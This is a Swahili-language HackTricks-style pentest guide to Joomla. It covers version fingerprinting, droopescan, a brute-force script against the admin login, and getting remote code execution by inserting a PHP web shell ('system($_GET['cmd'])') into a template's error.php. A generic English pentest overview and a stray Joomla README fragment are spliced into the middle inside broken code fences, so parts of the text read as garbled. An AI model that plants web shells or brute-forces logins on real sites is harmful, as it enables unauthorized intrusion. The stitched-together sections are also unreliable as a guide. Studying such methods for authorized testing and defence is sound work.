# Joomla

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

### Takwimu za Joomla

Joomla inakusanya takwimu za [matumizi](https://developer.joomla.org/about/stats.html) kama vile maelezo ya toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia [API](https://developer.joomla.org/about/stats/api.html) yao ya umma.
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## Uchambuzi

### Ugunduzi/Uchunguzi

* Angalia **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt

Robots.txt ni faili ya maandishi ambayo inawasilisha maelekezo kwa bots za injini za utafutaji kuhusu ni sehemu gani za tovuti wanaruhusiwa kufikia au kuzuiwa kufikia. Faili hii inaweza kuwa na athari kubwa kwa uwezo wa bots za injini za utafutaji kuchambua na kuchapisha kurasa za tovuti yako.

Kwa kawaida, robots.txt inapatikana kwa umma na inaweza kupatikana kwa urahisi kwa kuongeza "/robots.txt" kwenye URL ya tovuti. Kwa mfano, www.example.com/robots.txt.

Kwa wapenzi wa usalama, robots.txt inaweza kutoa habari muhimu kuhusu muundo wa tovuti, faili zilizozuiwa, na maeneo yaliyolindwa. Hii inaweza kuwa muhimu kwa wadukuzi ambao wanataka kupata ufikiaji usio halali kwenye tovuti.

Kwa hivyo, wakati wa kufanya pentesting kwenye tovuti iliyotengenezwa kwa kutumia Joomla, ni muhimu kuchunguza faili ya robots.txt ili kupata habari muhimu ambayo inaweza kusaidia katika kuvunja usalama wa tovuti hiyo.
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
# Joomla

## Introduction

Joomla is a popular open-source content management system (CMS) used for building websites and online applications. It is written in PHP and uses a MySQL database to store content. As with any web application, Joomla can have security vulnerabilities that can be exploited by attackers. In this section, we will explore some common vulnerabilities and techniques for pentesting Joomla websites.

## Enumeration

Before starting the pentesting process, it is important to gather information about the target Joomla website. This can be done through various enumeration techniques, such as:

1. **Banner Grabbing**: Retrieve the Joomla version by analyzing the server's response headers or error pages.
2. **Directory Enumeration**: Identify directories and files that may contain sensitive information or configuration files.
3. **Spidering**: Use tools like `wget` or `Burp Suite` to crawl the website and discover hidden pages or directories.
4. **Brute-Forcing**: Attempt to guess common usernames and passwords for the Joomla administration panel.

## Exploitation

Once the enumeration phase is complete, it is time to exploit any vulnerabilities found. Some common vulnerabilities in Joomla include:

1. **SQL Injection**: Exploit poorly sanitized user input to manipulate the database and extract sensitive information.
2. **File Inclusion**: Abuse insecure file inclusion functions to execute arbitrary code on the server.
3. **Cross-Site Scripting (XSS)**: Inject malicious scripts into web pages viewed by other users, potentially leading to session hijacking or defacement.
4. **Remote Code Execution (RCE)**: Execute arbitrary commands on the server by exploiting vulnerabilities in Joomla extensions or plugins.

## Post-Exploitation

After successfully exploiting a vulnerability, the attacker may gain unauthorized access to the Joomla website. At this stage, they can perform various actions, such as:

1. **Privilege Escalation**: Attempt to elevate their privileges to gain administrative access.
2. **Data Exfiltration**: Steal sensitive data from the Joomla database or file system.
3. **Defacement**: Modify the appearance of the website to display unauthorized content.
4. **Backdooring**: Install a persistent backdoor to maintain access to the compromised Joomla website.

## Conclusion

Pentesting Joomla websites requires a combination of enumeration, exploitation, and post-exploitation techniques. By understanding the common vulnerabilities and attack vectors, security professionals can better protect Joomla installations and prevent unauthorized access.
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### Toleo

* Katika **/administrator/manifests/files/joomla.xml** unaweza kuona toleo.
* Katika **/language/en-GB/en-GB.xml** unaweza kupata toleo la Joomla.
* Katika **plugins/system/cache/cache.xml** unaweza kuona toleo takriban.
```bash
droopescan scan joomla --url http://joomla-site.local/
```
In[ **80,443 - Pentesting Web Methodology ni sehemu kuhusu skana za CMS**](./#cms-scanners) ambazo zinaweza kuscan Joomla.

### Brute-Force

Unaweza kutumia [script](https://github.com/ajnik/joomla-bruteforce) hii kujaribu kufanya Brute-Force kwenye kuingia.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin
```
## RCE

Ikiwa umefanikiwa kupata **vitambulisho vya admin**, unaweza **kufanya RCE ndani yake** kwa kuongeza kipande kidogo cha **msimbo wa PHP** ili kupata **RCE**. Tunaweza kufanya hivi kwa **kubinafsisha** **template**.

1. **Bonyeza** kwenye **`Templates`** chini kushoto chini ya `Configuration` ili kupata menyu ya templeti.
2. **Bonyeza** jina la **template**. Hebu tuchague **`protostar`** chini ya kichwa cha safu ya `Template`. Hii itatupeleka kwenye ukurasa wa **`Templates: Customise`**.
3. Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata **chanzo cha ukurasa**. Hebu tuchague ukurasa wa **`error.php`**. Tutaweka **PHP one-liner ili kupata utekelezaji wa msimbo** kama ifuatavyo:
1. **`system($_GET['cmd']);`**
4. **Hifadhi & Funga**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>